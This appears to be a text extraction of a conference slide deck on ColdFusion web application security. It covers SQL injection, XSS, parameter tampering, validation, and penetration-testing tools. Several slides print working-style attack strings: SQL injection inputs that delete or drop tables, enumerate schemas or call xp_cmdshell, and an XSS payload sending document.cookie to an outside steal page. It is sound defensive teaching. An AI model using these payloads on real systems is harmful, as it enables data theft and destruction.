Title: Web Application Security: Practicing Defense InDepth
1Web Application Security Practicing Defense
In-Depth
- Dean H. Saxe
- dean_at_fullfrontalnerdity.com
2Tonights Presentation
- What will be covered
- OWASP Top Ten
- Defense In Depth - The Onion Model
- Penetration testing
- Web App Firewalls
- Web Application Vulnerability Scanners
- Tools
- Resources
3Security Misconceptions
- The Firewall protects my web server and database
- Access to the server through ports 80 and 443
makes the web server part of your external
perimeter defenses - Vulnerabilities in the web server software or web
applications may allow access to internal network
resources
4Security Misconceptions
- The IDS protects my web server and database
- The IDS is configured to detect signatures of
various well-known attacks - Attack signatures do not include those for
attacks against custom applications
5Security Misconceptions
- SSL secures my site
- SSL secures the transport of data between the web
server and the users browser - SSL does not protect against attacks against the
server and applications - SSL is the hackers best friend due to the false
sense of security
6Open Web Application Security Project
- http//www.owasp.org
- OWASP Top Ten Vulnerabilities
- OWASP Guide
- OWASP Testing Guide
- WebGoat
- And much more to come
7Web Applications First Line of Defense?
- Requests can be sent from around the world
- Jon Postel on TCP/IP
- Be liberal in what you accept and conservative
in what you send - Not all HTTP requests are valid but are often
accepted by the web server - Many webapps are liberal in what they accept
(poor validation) resulting in undesirable
behaviors
8SQL Injection I
- SQL Injection is a command injection attack
caused by unvalidated input and string-building
to craft DB queries - Attacker sends specially crafted data to the
application in order to modify the queries being
sent to the DB
9SQL Injection II
- SELECT
- FROM accounts
- WHERE acct_id URL.acct_id
10SQL Injection III
- GET /view_account.cfm?acct_id28 HTTP/1.1
- SELECT
- FROM accounts
- WHERE acct_id 28
11SQL Injection IV
- GET /view_account.cfm?acct_id28 OR 11 HTTP/1.1
- SELECT
- FROM accounts
- WHERE acct_id 28 OR 11
12SQL Injection V
- SELECT
- FROM users
- WHERE username URL.lastname
13SQL Injection VI
- GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
- SELECT
- FROM users
- WHERE lastname OMalley
14SQL Injection VII
- ltcfset URL.lastname URL.lastnamegt
- SELECT
- FROM users
- WHERE username preserveSingleQuotes(URL.lastnam
e) - GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
- SELECT
- FROM users
- WHERE lastname OMalley
15SQL Injection VIII
- GET /user_lookup.cfm? lastnamefooDELETE FROM
users WHERE 11 HTTP/1.1 - SELECT
- FROM users
- WHERE lastname fooDELETE FROM users WHERE
11
16SQL Injection IX
- CF 5 bug prevents escaping of single quotes in
queries when the variable being evaluated uses
array syntax. - SELECT
- FROM users
- WHERE username URLlastname
- GET /user_lookup.cfm? lastnameOMalley HTTP/1.1
- SELECT
- FROM users
- WHERE lastname OMalley
17SQL Injection Useful Injection Strings
- acct_id28 OR 1 1
- Try various OR clauses using ltgt, gt, gt, LIKE,
etc. - Use comments to end a statement prematurely
- SELECT FROM users WHERE user_id 1-- AND
passwordmypass - Enumerate database information
- acct_id28 UNION SELECT name ,1,2, FROM
sysobjects WHERE xtypeU - acct_id28 UNION SELECT columnames FROM table
- UNION requires both statements to share a common
number of columns, add columns as required
18SQL Injection SQL Server
- Concatenate multiple statements with semicolons
- acct_id28 DROP TABLE Users
- Useful Stored Procedures
- xp_msver
- xp_cmdshell command
- xp_servicecontrol action service
19SQL Injection Oracle
- Multiple statements not allowed
- Enumerate database
- acct_id28 UNION SELECT username FROM all_users
- acct_id28 UNION SELECT object_type, owner FROM
all_objects - Abuse ALL_, USER_, V views
20SQL Injection Mitigation Techniques
- Principle of Least Privileges
- Database should run with lowest possible system
privileges - Database users should be allowed the least
possible privileges. Disable privileges to
stored procedures, tables, etc when not required. - Limit execution privileges for users to SELECT,
UPDATE, DELETE and user stored procedures - Dont use sa!
21SQL Injection Prevention
- Parameterized queries
- ltcfqueryparamgt
- ltcfstoredprocparamgt
- Cant be used with cachedwithin, cacheduntil
attributes of ltcfquerygt - Data validation
- Stored procedures
22Cross Site Scripting (XSS)
- Attacker injects client-side scripts (JavaScript)
into the browser - Code is executed by the browser to perform some
action - Major XSS methods
- Social Engineering Entice user to click on link
with malicious payload - Stored data invokes JavaScript when the user
views a page (e.g. user forums)
23XSS Examples
- ltscriptgtlocation.hrefhttp//10.1.1.1/steal.cfm?c
document.cookielt/scriptgt - lta hrefjavas99ript35codegt
- ltdiv stylebehaviour url(link to code)gt
- ltbody onloadcodegt
- ltimg srcjavascriptcodegt
- Attempt hex and double-Unicode encoding to
subvert blacklists - And many, many more.
24Cross Site Scripting Prevention
- Input validation
- Output filtering
- htmlEditFormat()
- Replaces lt, gt, , with their entity values
- extendedHtmlEditFormat()
- Write a UDF to escape special characters in
content that may be used for XSS - Replace lt, gt, , , (, ), with their entity
values - Wrap all output with potentially dangerous
characters in the UDF - Ability to quickly add new characters quickly if
new attacks are discovered
25Parameter Tampering
- Modifying pre-set variables in order to subvert
application logic - Change a list of states to include the option
value - GADELETE FROM users WHERE 1 1
- Modification of cookies, query strings, hidden
fields, select boxes, check boxes, radio buttons
and other fixed data - Change cookie value adminn gt adminy to elevate
privileges - Index.cfm?modedebug can be used to elicit the
debug mode of ColdFusion, potentially revealing
template and database info. - ltcfsetting showdebugoutputfalsegt in
Application.cfm will prevent debug information
from ever being show. - Limiting debug output to 127.0.0.1 on production
servers can also be used
26Parameter Tampering Prevention
- Data validation
- Must be server-side, client-side validation with
JavaScript can be subverted easily - Ensures data is within specified character set,
length, etc. - Validate multiple pieces of information which are
interdependent - Validate all data from the browser (CGI.,
COOKIE., FORM., URL.) for content, extra
fields, missing fields, duplicated fields - All validation must be complete before any
further processing of the request. Consider
moving validated data to a new scope
(VALIDATED.FORM.field_name) for easy code reviews
27Whitelist vs. Blacklist
- Whats a blacklist?
- Blacklists are a used for negative assertion that
the data being analyzed is not in the blacklist - Whats a whitelist?
- Whitelists are used for positive assertion that
the data being analyzed match an item in the
whitelist - Which is better and why?
28Whitelist Is a Better Approach
- Searching for valid data easier than invalid data
- Attackers represent data in many different manners
29Building a Better Validation Engine
- Identify general data types and valid content for
each - Alphabetic
- Alphanumeric
- Special characters
- Numeric
- Integer
- Floating point
- Comma or period delimited? Negative numbers?
- HTML content
- Limit accepted tags and attributes with
whitelists for acceptable content
30Building a Better Validation Engine II
- Validate all data received from the users
browser - Hidden form fields, check boxes, select boxes all
require validation! - Use indirection rather than primary keys
- Present user with a select box with option values
of 1..N, referencing the ordinal position of the
item in an array in the users state - Validate value is within the bounds of the array
31Building a Better Validation Engine Indirection
- ltselect nameacct_idgt
- ltcfoutput querylist_accountsgt
- ltoption valueacct_idgtacct_name
acct_numberlt/optiongt - lt/cfoutputgt
- lt/selectgt
- ltcfset VARIABLES.acct_id_array arrayNew(1)gt
- ltselect nameacct_idgt
- ltcfoutput querylist_accountsgt
- ltcfset arrayAppend(VARIABLES.acct_id_array,
acct_id)gt - ltoption
- valuearrayLen(VARIABLES.acct_id_array)gt
- acct_nameacct_number
- lt/optiongt
- lt/cfoutputgt
- lt/selectgt
32Building a Better Validation Engine VI
- Requirements for a better engine
- Register form fields with their validation
routines when creating views - Automatic indirection
- Automatic server-side validation cannot be
subverted by developer - Easy to scan for proper use of validation engine
- Built-in validators for common data types
- Additional client-side validation, too!
- Where is this mythical product for CF?
33Error Handling
- Application Errors
- Errors are an attackers best friend since they
often reveal sensitive information - Hide the error from the user by logging
server-side and providing a unique ID to
reference the error - Data validation errors
- Bad Input
- Malicious Input
34Encryption and Hashing
- Encryption is used to hide data
- Hashing is used to verify integrity of data
- Both are generally used improperly leading to a
false sense of security - Practical Cryptography by Niels Ferguson and
Bruce Schneier
35Web and Applications Server Misconfiguration
- Backup files left accessible in the web root
- Admin directories and applications exposed to the
outside world - CFAdministrator
- IIS Control Panel
36Broken Access Controls
- Forced Browsing
- Malicious user can manually browse to any page on
the server, potentially escaping access control - Use an architecture that allows the user to be
tracked through the application with positive
assertion that he has access to the page being
requested and it is not out of sequence for the
current process
37Grab Bag
- Secure cookies
- Comments
- Parameter Tampering via Cookie Poisoning
- Add HMAC to cookie to prevent tampering
- Hash(saltvalue) gt HMAC
- Modifying hidden fields
- Store in state data
38Penetration Testing Your Apps
- Man In The Middle Proxies
- Used to trap HTTP request/response stream and
modify data on the fly - Achilles
- Paros
- WebScarab
39Penetration Testing Your Apps II
- Testing Server Hardening
- Nikto - scan for well known vulnerabilities on
web servers - Nmap - Port scanner to scan the network for open
ports - Netcat - Network Swiss Army knife. Useful for
connecting to web servers or other open ports for
banner grabbing, reconnaisance. Can be used for
shell shovelling - openSSL - Open source SSL toolkit. Used to
create SSL proxy for netcat to explore secure
webservers
40Penetration Testing Your Apps III
- Web Application Vulnerability Scanners
- Automatically walk your application, scanning for
XSS, SQL Injection, server-level vulnerabilities - WebInspect
- ScanDo
- AppScan
- 6-20 hit rate
- Outsource the work
- There is no body in charge of certifying the
quality of the work done by various PenTest
companies. Buyer beware! - ISS
- FoundStone
- Etc.
41Securing Your Apps
- Very large body of existing code needs
remediation - Identify priorities
- What can be done quickly?
- Configuration of servers
- Global error handling
- Assess value of assets to be protected
- Protect high value assets first
42Securing Your Apps II
- Web Application Firewalls
- Vendors claim quick deployment to protect apps
- Reality is not so quick, depending on size and
complexity of app - Brings business logic into another application
layer - Requires identifying params passed to each page,
writing of appropriate RegEx - Misses parameter tampering if data matches regex
43Resources
- OWASP
- SecurityFocus
- SPIDynamics
- FoundStone
- www.hackingexposed.com
- Innocent Code by Sverre H. Huseby
- Training Courses
- Foundstone
- Intense Training
44Comments/Questions?
- Dean H. Saxe
- dean_at_fullfrontalnerdity.com